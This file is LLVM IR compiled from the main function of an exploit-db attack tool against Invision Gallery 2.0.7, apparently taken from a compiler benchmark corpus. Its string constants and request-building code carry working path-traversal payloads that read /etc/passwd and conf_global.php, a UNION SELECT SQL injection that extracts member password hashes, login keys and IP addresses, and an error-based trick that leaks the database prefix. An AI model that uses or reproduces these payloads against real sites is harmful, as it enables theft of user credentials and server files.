; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/php/webapps/extr_2473.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/php/webapps/extr_2473.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [67 x i8] c"\0A ...............................................................\0A\00", align 1
@.str.1 = private unnamed_addr constant [68 x i8] c"  Invision Gallery 2.0.7 ReadFile() & SQL injection exploit       \0A\00", align 1
@.str.2 = private unnamed_addr constant [68 x i8] c"         (c)oded by _1nf3ct0r_ // Hell Knights Crew               \0A\00", align 1
@.str.3 = private unnamed_addr constant [68 x i8] c"               http://hellknights.void.ru/                        \0A\00", align 1
@.str.4 = private unnamed_addr constant [68 x i8] c"  Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team   \0A\00", align 1
@.str.5 = private unnamed_addr constant [68 x i8] c" ...............................................................  \0A\00", align 1
@.str.6 = private unnamed_addr constant [20 x i8] c"\0A\0A [+] ReadFile():\0A\00", align 1
@.str.7 = private unnamed_addr constant [13 x i8] c"  - syntax:\0A\00", align 1
@.str.8 = private unnamed_addr constant [48 x i8] c"  readfile 1 <host> <pathtoindex> <localfile> \0A\00", align 1
@.str.9 = private unnamed_addr constant [82 x i8] c"  readfile 2 <host> <pathtoindex> <localfile>   -- try it 1f readfile[1] failed \0A\00", align 1
@.str.10 = private unnamed_addr constant [14 x i8] c"  - params: \0A\00", align 1
@.str.11 = private unnamed_addr constant [87 x i8] c"  <localfile> -  path to local file (../file), f0r example: ../../../../../etc/passwd\0A\00", align 1
@.str.12 = private unnamed_addr constant [82 x i8] c"  s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit  \0A\00", align 1
@.str.13 = private unnamed_addr constant [15 x i8] c"  - examples:\0A\00", align 1
@.str.14 = private unnamed_addr constant [60 x i8] c"  readfile 1 asd.ru index.php ../../../../../../etc/passwd\0A\00", align 1
@.str.15 = private unnamed_addr constant [59 x i8] c"  readfile 1 asd.ru forum/index.php ../../conf_global.php\0A\00", align 1
@.str.16 = private unnamed_addr constant [64 x i8] c"  readfile 1 asd.ru forum/index.php ../../conf_global.php%00\0A\0A\0A\00", align 1
@.str.17 = private unnamed_addr constant [21 x i8] c" [+] SQL-injection:\0A\00", align 1
@.str.18 = private unnamed_addr constant [12 x i8] c"  - syntax\0A\00", align 1
@.str.19 = private unnamed_addr constant [72 x i8] c"  sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\0A\00", align 1
@.str.20 = private unnamed_addr constant [76 x i8] c"  getprefix <host> <pathtoindex>   -- get database prefix from IPB error  \0A\00", align 1
@.str.21 = private unnamed_addr constant [13 x i8] c"  - params:\0A\00", align 1
@.str.22 = private unnamed_addr constant [71 x i8] c"  <member_id> -  member's id for SQL-injection result, for example: 1\0A\00", align 1
@.str.23 = private unnamed_addr constant [77 x i8] c"  <column>    -  ipb members' column to get. for example: ip_adress, email.\0A\00", align 1
@.str.24 = private unnamed_addr constant [56 x i8] c"  <table>     -  ipb table to use. f0r example: member\0A\00", align 1
@.str.25 = private unnamed_addr constant [36 x i8] c"  <prefix>    -  database prefix. \0A\00", align 1
@.str.26 = private unnamed_addr constant [70 x i8] c"  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  \0A\00", align 1
@.str.27 = private unnamed_addr constant [70 x i8] c"  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1\0A\00", align 1
@.str.28 = private unnamed_addr constant [68 x i8] c"  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\0A\0A\00", align 1
@.str.29 = private unnamed_addr constant [9 x i8] c"readfile\00", align 1
@.str.30 = private unnamed_addr constant [2 x i8] c"1\00", align 1
@.str.31 = private unnamed_addr constant [6 x i8] c"GET /\00", align 1
@.str.32 = private unnamed_addr constant [62 x i8] c"?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=\00", align 1
@.str.33 = private unnamed_addr constant [18 x i8] c" HTTP/1.0\0D\0AHost: \00", align 1
@.str.34 = private unnamed_addr constant [5 x i8] c"\0D\0A\0D\0A\00", align 1
@.str.35 = private unnamed_addr constant [2 x i8] c"2\00", align 1
@.str.36 = private unnamed_addr constant [47 x i8] c"?act=gallery&code=viewimage&img=index.gif&dir=\00", align 1
@.str.37 = private unnamed_addr constant [10 x i8] c"sqlinject\00", align 1
@.str.38 = private unnamed_addr constant [75 x i8] c"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,\00", align 1
@.str.39 = private unnamed_addr constant [27 x i8] c",1,1,1,1,1,1,1,1%20FROM%20\00", align 1
@.str.40 = private unnamed_addr constant [15 x i8] c"%20WHERE%20id=\00", align 1
@.str.41 = private unnamed_addr constant [10 x i8] c"/*31337*/\00", align 1
@.str.42 = private unnamed_addr constant [10 x i8] c"getprefix\00", align 1
@.str.43 = private unnamed_addr constant [71 x i8] c"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew\00", align 1
@.str.44 = private unnamed_addr constant [98 x i8] c"\0A\0A\0A[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i8*, align 8
  %8 = alloca i8*, align 8
  %9 = alloca i8*, align 8
  %10 = alloca i8*, align 8
  %11 = alloca i8*, align 8
  %12 = alloca [1024 x i8], align 16
  %13 = alloca [1024 x i8], align 16
  %14 = alloca i8*, align 8
  %15 = alloca i8*, align 8
  %16 = alloca i8*, align 8
  %17 = alloca i8*, align 8
  %18 = alloca i8*, align 8
  %19 = alloca i8*, align 8
  %20 = alloca [1024 x i8], align 16
  %21 = alloca i8*, align 8
  %22 = alloca i8*, align 8
  %23 = alloca [1024 x i8], align 16
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %24 = call i32 @MAKEWORD(i32 2, i32 2)
  %25 = call i32 @WSAStartup(i32 %24, i32* %6)
  %26 = call i32 @printf(i8* getelementptr inbounds ([67 x i8], [67 x i8]* @.str, i64 0, i64 0))
  %27 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.1, i64 0, i64 0))
  %28 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.2, i64 0, i64 0))
  %29 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.3, i64 0, i64 0))
  %30 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.4, i64 0, i64 0))
  %31 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.5, i64 0, i64 0))
  %32 = load i32, i32* %4, align 4
  %33 = icmp eq i32 %32, 1
  br i1 %33, label %34, label %59

34:                                               ; preds = %2
  %35 = call i32 @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.6, i64 0, i64 0))
  %36 = call i32 @printf(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.7, i64 0, i64 0))
  %37 = call i32 @printf(i8* getelementptr inbounds ([48 x i8], [48 x i8]* @.str.8, i64 0, i64 0))
  %38 = call i32 @printf(i8* getelementptr inbounds ([82 x i8], [82 x i8]* @.str.9, i64 0, i64 0))
  %39 = call i32 @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.10, i64 0, i64 0))
  %40 = call i32 @printf(i8* getelementptr inbounds ([87 x i8], [87 x i8]* @.str.11, i64 0, i64 0))
  %41 = call i32 @printf(i8* getelementptr inbounds ([82 x i8], [82 x i8]* @.str.12, i64 0, i64 0))
  %42 = call i32 @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.13, i64 0, i64 0))
  %43 = call i32 @printf(i8* getelementptr inbounds ([60 x i8], [60 x i8]* @.str.14, i64 0, i64 0))
  %44 = call i32 @printf(i8* getelementptr inbounds ([59 x i8], [59 x i8]* @.str.15, i64 0, i64 0))
  %45 = call i32 @printf(i8* getelementptr inbounds ([64 x i8], [64 x i8]* @.str.16, i64 0, i64 0))
  %46 = call i32 @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.17, i64 0, i64 0))
  %47 = call i32 @printf(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.18, i64 0, i64 0))
  %48 = call i32 @printf(i8* getelementptr inbounds ([72 x i8], [72 x i8]* @.str.19, i64 0, i64 0))
  %49 = call i32 @printf(i8* getelementptr inbounds ([76 x i8], [76 x i8]* @.str.20, i64 0, i64 0))
  %50 = call i32 @printf(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.21, i64 0, i64 0))
  %51 = call i32 @printf(i8* getelementptr inbounds ([71 x i8], [71 x i8]* @.str.22, i64 0, i64 0))
  %52 = call i32 @printf(i8* getelementptr inbounds ([77 x i8], [77 x i8]* @.str.23, i64 0, i64 0))
  %53 = call i32 @printf(i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.24, i64 0, i64 0))
  %54 = call i32 @printf(i8* getelementptr inbounds ([36 x i8], [36 x i8]* @.str.25, i64 0, i64 0))
  %55 = call i32 @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.13, i64 0, i64 0))
  %56 = call i32 @printf(i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.26, i64 0, i64 0))
  %57 = call i32 @printf(i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.27, i64 0, i64 0))
  %58 = call i32 @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.28, i64 0, i64 0))
  store i32 1, i32* %3, align 4
  br label %219

59:                                               ; preds = %2
  %60 = load i8**, i8*** %5, align 8
  %61 = getelementptr inbounds i8*, i8** %60, i64 1
  %62 = load i8*, i8** %61, align 8
  store i8* %62, i8** %7, align 8
  %63 = load i8*, i8** %7, align 8
  %64 = call i64 @strcmp(i8* %63, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.29, i64 0, i64 0))
  %65 = icmp eq i64 %64, 0
  br i1 %65, label %66, label %130

66:                                               ; preds = %59
  %67 = load i8**, i8*** %5, align 8
  %68 = getelementptr inbounds i8*, i8** %67, i64 2
  %69 = load i8*, i8** %68, align 8
  store i8* %69, i8** %8, align 8
  store i8* null, i8** %9, align 8
  %70 = load i8**, i8*** %5, align 8
  %71 = getelementptr inbounds i8*, i8** %70, i64 4
  %72 = load i8*, i8** %71, align 8
  store i8* %72, i8** %9, align 8
  %73 = load i8**, i8*** %5, align 8
  %74 = getelementptr inbounds i8*, i8** %73, i64 5
  %75 = load i8*, i8** %74, align 8
  store i8* %75, i8** %10, align 8
  %76 = load i8**, i8*** %5, align 8
  %77 = getelementptr inbounds i8*, i8** %76, i64 3
  %78 = load i8*, i8** %77, align 8
  store i8* %78, i8** %11, align 8
  %79 = load i8*, i8** %8, align 8
  %80 = call i64 @strcmp(i8* %79, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.30, i64 0, i64 0))
  %81 = icmp eq i64 %80, 0
  br i1 %81, label %82, label %103

82:                                               ; preds = %66
  %83 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %84 = call i32 @strcpy(i8* %83, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.31, i64 0, i64 0))
  %85 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %86 = load i8*, i8** %9, align 8
  %87 = call i32 @strcat(i8* %85, i8* %86)
  %88 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %89 = call i32 @strcat(i8* %88, i8* getelementptr inbounds ([62 x i8], [62 x i8]* @.str.32, i64 0, i64 0))
  %90 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %91 = load i8*, i8** %10, align 8
  %92 = call i32 @strcat(i8* %90, i8* %91)
  %93 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %94 = call i32 @strcat(i8* %93, i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.33, i64 0, i64 0))
  %95 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %96 = load i8*, i8** %11, align 8
  %97 = call i32 @strcat(i8* %95, i8* %96)
  %98 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %99 = call i32 @strcat(i8* %98, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.34, i64 0, i64 0))
  %100 = getelementptr inbounds [1024 x i8], [1024 x i8]* %12, i64 0, i64 0
  %101 = load i8*, i8** %11, align 8
  %102 = call i32 @Exploit(i8* %100, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.29, i64 0, i64 0), i8* %101)
  br label %129

103:                                              ; preds = %66
  %104 = load i8*, i8** %8, align 8
  %105 = call i64 @strcmp(i8* %104, i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.35, i64 0, i64 0))
  %106 = icmp eq i64 %105, 0
  br i1 %106, label %107, label %128

107:                                              ; preds = %103
  %108 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %109 = call i32 @strcpy(i8* %108, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.31, i64 0, i64 0))
  %110 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %111 = load i8*, i8** %9, align 8
  %112 = call i32 @strcat(i8* %110, i8* %111)
  %113 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %114 = call i32 @strcat(i8* %113, i8* getelementptr inbounds ([47 x i8], [47 x i8]* @.str.36, i64 0, i64 0))
  %115 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %116 = load i8*, i8** %10, align 8
  %117 = call i32 @strcat(i8* %115, i8* %116)
  %118 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %119 = call i32 @strcat(i8* %118, i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.33, i64 0, i64 0))
  %120 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %121 = load i8*, i8** %11, align 8
  %122 = call i32 @strcat(i8* %120, i8* %121)
  %123 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %124 = call i32 @strcat(i8* %123, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.34, i64 0, i64 0))
  %125 = getelementptr inbounds [1024 x i8], [1024 x i8]* %13, i64 0, i64 0
  %126 = load i8*, i8** %11, align 8
  %127 = call i32 @Exploit(i8* %125, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.29, i64 0, i64 0), i8* %126)
  br label %128

128:                                              ; preds = %107, %103
  br label %129

129:                                              ; preds = %128, %82
  br label %130

130:                                              ; preds = %129, %59
  %131 = load i8*, i8** %7, align 8
  %132 = call i64 @strcmp(i8* %131, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.37, i64 0, i64 0))
  %133 = icmp eq i64 %132, 0
  br i1 %133, label %134, label %188

134:                                              ; preds = %130
  %135 = load i8**, i8*** %5, align 8
  %136 = getelementptr inbounds i8*, i8** %135, i64 2
  %137 = load i8*, i8** %136, align 8
  store i8* %137, i8** %14, align 8
  %138 = load i8**, i8*** %5, align 8
  %139 = getelementptr inbounds i8*, i8** %138, i64 3
  %140 = load i8*, i8** %139, align 8
  store i8* %140, i8** %15, align 8
  %141 = load i8**, i8*** %5, align 8
  %142 = getelementptr inbounds i8*, i8** %141, i64 5
  %143 = load i8*, i8** %142, align 8
  store i8* %143, i8** %16, align 8
  %144 = load i8**, i8*** %5, align 8
  %145 = getelementptr inbounds i8*, i8** %144, i64 4
  %146 = load i8*, i8** %145, align 8
  store i8* %146, i8** %17, align 8
  %147 = load i8**, i8*** %5, align 8
  %148 = getelementptr inbounds i8*, i8** %147, i64 6
  %149 = load i8*, i8** %148, align 8
  store i8* %149, i8** %18, align 8
  %150 = load i8**, i8*** %5, align 8
  %151 = getelementptr inbounds i8*, i8** %150, i64 7
  %152 = load i8*, i8** %151, align 8
  store i8* %152, i8** %19, align 8
  %153 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %154 = call i32 @strcpy(i8* %153, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.31, i64 0, i64 0))
  %155 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %156 = load i8*, i8** %15, align 8
  %157 = call i32 @strcat(i8* %155, i8* %156)
  %158 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %159 = call i32 @strcat(i8* %158, i8* getelementptr inbounds ([75 x i8], [75 x i8]* @.str.38, i64 0, i64 0))
  %160 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %161 = load i8*, i8** %17, align 8
  %162 = call i32 @strcat(i8* %160, i8* %161)
  %163 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %164 = call i32 @strcat(i8* %163, i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.39, i64 0, i64 0))
  %165 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %166 = load i8*, i8** %16, align 8
  %167 = call i32 @strcat(i8* %165, i8* %166)
  %168 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %169 = load i8*, i8** %18, align 8
  %170 = call i32 @strcat(i8* %168, i8* %169)
  %171 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %172 = call i32 @strcat(i8* %171, i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.40, i64 0, i64 0))
  %173 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %174 = load i8*, i8** %19, align 8
  %175 = call i32 @strcat(i8* %173, i8* %174)
  %176 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %177 = call i32 @strcat(i8* %176, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.41, i64 0, i64 0))
  %178 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %179 = call i32 @strcat(i8* %178, i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.33, i64 0, i64 0))
  %180 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %181 = load i8*, i8** %14, align 8
  %182 = call i32 @strcat(i8* %180, i8* %181)
  %183 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %184 = call i32 @strcat(i8* %183, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.34, i64 0, i64 0))
  %185 = getelementptr inbounds [1024 x i8], [1024 x i8]* %20, i64 0, i64 0
  %186 = load i8*, i8** %14, align 8
  %187 = call i32 @Exploit(i8* %185, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.37, i64 0, i64 0), i8* %186)
  br label %188

188:                                              ; preds = %134, %130
  %189 = load i8*, i8** %7, align 8
  %190 = call i64 @strcmp(i8* %189, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.42, i64 0, i64 0))
  %191 = icmp eq i64 %190, 0
  br i1 %191, label %192, label %217

192:                                              ; preds = %188
  %193 = load i8**, i8*** %5, align 8
  %194 = getelementptr inbounds i8*, i8** %193, i64 3
  %195 = load i8*, i8** %194, align 8
  store i8* %195, i8** %21, align 8
  %196 = load i8**, i8*** %5, align 8
  %197 = getelementptr inbounds i8*, i8** %196, i64 2
  %198 = load i8*, i8** %197, align 8
  store i8* %198, i8** %22, align 8
  %199 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %200 = call i32 @strcpy(i8* %199, i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.31, i64 0, i64 0))
  %201 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %202 = load i8*, i8** %21, align 8
  %203 = call i32 @strcat(i8* %201, i8* %202)
  %204 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %205 = call i32 @strcat(i8* %204, i8* getelementptr inbounds ([71 x i8], [71 x i8]* @.str.43, i64 0, i64 0))
  %206 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %207 = call i32 @strcat(i8* %206, i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.33, i64 0, i64 0))
  %208 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %209 = load i8*, i8** %22, align 8
  %210 = call i32 @strcat(i8* %208, i8* %209)
  %211 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %212 = call i32 @strcat(i8* %211, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.34, i64 0, i64 0))
  %213 = call i32 @printf(i8* getelementptr inbounds ([98 x i8], [98 x i8]* @.str.44, i64 0, i64 0))
  %214 = getelementptr inbounds [1024 x i8], [1024 x i8]* %23, i64 0, i64 0
  %215 = load i8*, i8** %22, align 8
  %216 = call i32 @Exploit(i8* %214, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.29, i64 0, i64 0), i8* %215)
  br label %217

217:                                              ; preds = %192, %188
  %218 = call i32 (...) @WSACleanup()
  store i32 0, i32* %3, align 4
  br label %219

219:                                              ; preds = %217, %34
  %220 = load i32, i32* %3, align 4
  ret i32 %220
}

declare dso_local i32 @WSAStartup(i32, i32*) #1

declare dso_local i32 @MAKEWORD(i32, i32) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i64 @strcmp(i8*, i8*) #1

declare dso_local i32 @strcpy(i8*, i8*) #1

declare dso_local i32 @strcat(i8*, i8*) #1

declare dso_local i32 @Exploit(i8*, i8*, i8*) #1

declare dso_local i32 @WSACleanup(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
